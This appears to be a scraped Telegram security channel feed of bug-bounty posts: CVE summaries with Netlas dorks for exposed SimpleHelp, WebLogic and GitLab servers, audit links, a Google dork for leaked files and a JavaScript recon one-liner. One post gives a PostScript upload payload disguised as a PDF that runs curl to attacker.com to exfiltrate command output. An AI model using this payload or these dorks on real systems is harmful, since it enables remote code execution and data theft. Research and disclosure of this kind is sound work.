CVE-2024-57726, -57727, -57728: Multiple vulnerabilities in SimpleHelp, 7.2 - 8.8 ratingโ๏ธ
The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allows RCE to be carried out.
Search at Netlas.io:
๐ Link: https://nt.ls/Frx6H
๐ Dork: http.headers.server:"SimpleHelp"
Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allows RCE to be carried out.
Search at Netlas.io:
๐ Link: https://nt.ls/Frx6H
๐ Dork: http.headers.server:"SimpleHelp"
Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
๐6
โก๏ธSmart contract security report. It contains 2 High, 6 Medium & 8 Low severity issues.
โ https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
โ https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
โค9๐2
https://solodit.cyfrin.io/
All disclosed web3 protocols vulnerability reports with filters (like Hacktivity)
All disclosed web3 protocols vulnerability reports with filters (like Hacktivity)
Cyfrin Solodit
Smart Contract Vulnerability Dataset - Cyfrin Solodit
Explore the worldโs largest data set of smart contract vulnerabilities, findings, and mitigations. Strengthen protocol and dApp security, research bugs before deployment.
๐ฅ11๐2
Does anyone have Aura+ Songs Playlist ? Do Drop in Comments! Thank You.
๐คจ4๐ฟ4
Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl https://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit
Please open Telegram to view this post
VIEW IN TELEGRAM
HackerOne
Semrush disclosed on HackerOne: Remote Code Execution on...
The Logo upload in the report constructor at: https://www.semrush.com/my_reports/constructor
{F340480}
is passed through a not properly patched version of ImageMagick. You can use Postscript to...
{F340480}
is passed through a not properly patched version of ImageMagick. You can use Postscript to...
๐ฅ8๐1
โกWayBackup Finder - A passive way to find backups/ sensitive information.
โ ๏ธ https://github.com/anmolksachan/WayBackupFinder
Please open Telegram to view this post
VIEW IN TELEGRAM
๐9โค1
CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating ๐ฅ
An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.
Search at Netlas.io:
๐ Link: https://nt.ls/6EpWK
๐ Dork: protocol:t3 OR protocol:t3s
Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.
Search at Netlas.io:
๐ Link: https://nt.ls/6EpWK
๐ Dork: protocol:t3 OR protocol:t3s
Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
๐6๐ซก1
Please open Telegram to view this post
VIEW IN TELEGRAM
๐11๐ฅ5โค3
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned ยซโถ๏ธ Explore Bug Bounty POC Videos: https://t.iss.one/brutsecurity_pocยป
Please open Telegram to view this post
VIEW IN TELEGRAM
jasper-join-7e5 on Notion
IDOR Cheat Sheet | Notion
What if I told you that there is a web application vulnerability so simple to exploit, that it could make bug hunting feel like a breeze?
๐12๐ฅ2โค1
New Business Logic POC Video Shared -https://t.iss.one/brutsecurity_poc/9
๐ฅ4โค1
CVE-2025-0314 and other: Multiple vulnerabilities in GitLab, 4.3 - 8.7 ratingโ๏ธ
In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
๐ Link: https://nt.ls/BNKS8
๐ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
๐ Link: https://nt.ls/BNKS8
๐ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
๐ค4
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)Please open Telegram to view this post
VIEW IN TELEGRAM
๐16๐ฅ13โค1
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'Please open Telegram to view this post
VIEW IN TELEGRAM
โค20๐ฅ16๐ณ1